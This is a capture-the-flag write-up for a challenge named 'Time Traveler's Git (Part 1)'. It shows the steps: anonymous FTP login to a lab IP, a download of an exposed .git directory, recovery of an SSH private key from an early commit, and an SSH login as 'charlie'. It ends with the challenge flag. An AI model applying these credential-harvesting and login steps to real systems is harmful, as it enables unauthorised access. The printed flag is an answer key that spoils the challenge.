search

Time Traveler's Git (Part 1)

hashtag
Description

You are a time traveler who stumbled upon an ancient Git repository containing valuable data from a long-gone era. However, the repository seems to have some hidden secrets and potential vulnerabilities in its history. Charlie is your friend.

143.110.189.89

hashtag
Solution

  • We are given an IP address.

  • Running a quick nmap scan on the IP address, we find that port 22 is open.

  • We can login to the ftp server using anonymous as the username.

ftp 143.110.180.89
Connected to 143.110.180.89.
220 (vsFTPd 3.0.5)
Name (143.110.180.89:ssk): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xr-xr-x  1    1000   1000    4096 Jul 25 10:31 .
dr-xr-xr-x  1    1000   1000    4096 Jul 25 10:31 ..
drwxrwxr-x  8    0      0       4096 Apr 09 18:58 .git
-rw-rw-r--  1    0      0       514  Apr 09 18:58 login.html
226 Directory send OK.

  • Download everything from .git and login.html using ftp

    • I downloaded everything manually like a noob.

    • Alternative way: wget -r --no-passive --no-parent --user=anonymous --password=anonymous ftp://143.110.180.89

  • Check the logs git log

  • Check the first commit: git checkout 5a496dbebbce1585698634e5348703b74e7ac781

  • We find an SSH key

  • Copy it to a file and change the permissions: (MAKE SURE THE FORMAT IS RIGHT!!!) chmod 600 id_rsa

  • Login to the server using the ssh key: ssh -i id_rsa charlie@0.cloud.chals.io -p <port-no>

  • List the files:

  • FLAG: KPMG_CTF{ed0d1d2926547a24488d29fb5c3941be}

Last updated